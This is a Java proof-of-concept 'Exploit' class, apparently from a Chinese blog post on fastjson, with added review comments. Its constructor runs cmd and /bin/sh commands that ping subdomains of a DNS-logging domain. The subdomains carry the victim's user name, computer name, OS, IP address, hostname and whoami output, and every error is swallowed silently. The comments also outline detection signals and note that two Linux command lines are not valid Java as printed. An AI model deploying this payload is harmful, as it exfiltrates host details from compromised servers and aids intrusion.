  • fastjson ping外带信息poc

    /**
     * Proof-of-concept class from the page: everything happens in the constructor, which
     * shells out to {@code ping} so that host details leave the machine as DNS lookups
     * against a DNS-logging domain.
     *
     * <p>What the code collects, as visible in the command strings:
     * <ul>
     *   <li>Windows: the {@code %username%}, {@code %computername%} and {@code %os%}
     *       environment variables, expanded by {@code cmd /c}.</li>
     *   <li>Linux: an address parsed from {@code ifconfig eth0} (dots replaced by dashes),
     *       the contents of {@code /proc/sys/kernel/hostname}, and the output of
     *       {@code whoami}, expanded by {@code /bin/sh -c} backticks.</li>
     * </ul>
     *
     * <p>There is no operating-system check: all seven commands are attempted on every host.
     * Each {@code exec} sits in its own try/catch with an empty handler, so a failed launch
     * leaves no trace from this class. The returned {@code Process} is discarded; its output
     * is never read and the code does not wait for it.
     *
     * <p>Defender's view: a successful run is visible as child processes of the JVM
     * ({@code cmd /c ping ...} or {@code /bin/sh -c ping ...}) and as DNS queries whose
     * leading labels are a fixed tag ({@code username}, {@code computername}, {@code os},
     * {@code ip}, {@code hostname}, {@code user}) followed by the collected value and then
     * {@code windows} or {@code linux}. Process-creation logging on Java services and
     * monitoring of outbound DNS for such label patterns cover both signals.
     *
     * <p>NOTE(review): the page title ties this to fastjson; presumably the class is meant to
     * be loaded and instantiated by a target JVM, but the delivery step is not shown here.
     */
    public class Exploit {
        /**
         * Runs the Windows and Linux lookups one after another; takes no input and keeps no
         * state. Every failure is swallowed.
         */
        public Exploit(){
            String base_url = ".egpkd5.dnslog.cn"; // your DNS-log domain (value as printed on the page)
            // Prefix that marks a query as coming from the Windows branch.
            String win_dnslog = "windows" + base_url;
            // windows
            try{
                // Current user name as a DNS label: username.<value>.windows<base_url>
                String[] commands = { "cmd", "/c", "ping username.%username%." + win_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // Deliberately silent: the stack trace call is commented out, so nothing is logged.
                // e.printStackTrace();
            }
            try{
                // Machine name as a DNS label: computername.<value>.windows<base_url>
                String[] commands = { "cmd", "/c", "ping computername.%computername%." + win_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                // %os% environment variable as a DNS label: os.<value>.windows<base_url>
                String[] commands = { "cmd", "/c", "ping os.%os%." + win_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            
            
            // linux
            // Prefix that marks a query as coming from the Linux branch.
            String linux_dnslog = "linux" + base_url;
            try{
    
                // Address of eth0 taken from ifconfig, with dots turned into dashes so it fits in one label.
                // NOTE(review): as printed on the page this literal is not valid Java (quoting inside
                // the string), so the listing does not compile as shown; left untouched here.
                String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/\./,"-"); print $0 }'`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                // Same lookup without the extra "awk -F:" split, presumably for a different ifconfig
                // output format. The same quoting problem applies to this line.
                String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/\./,"-"); print $0 }'`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                // Kernel hostname as a DNS label: hostname.<value>.linux<base_url>
                String[] commands = { "/bin/sh", "-c", "ping hostname.`cat /proc/sys/kernel/hostname`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
            try{
                // Account the JVM runs as: user.<value>.linux<base_url>
                String[] commands = { "/bin/sh", "-c", "ping user.`whoami`." + linux_dnslog};
                Runtime.getRuntime().exec(commands);
            }catch(Exception e){
                // e.printStackTrace();
            }
        }
        /**
         * Local entry point: constructing the object is the whole program, because the
         * constructor does all the work. The instance itself is unused.
         */
        public static void main(String[] args){
            Exploit e = new Exploit();
        }
    }
    
  • 原文地址:https://www.cnblogs.com/huim/p/12000884.html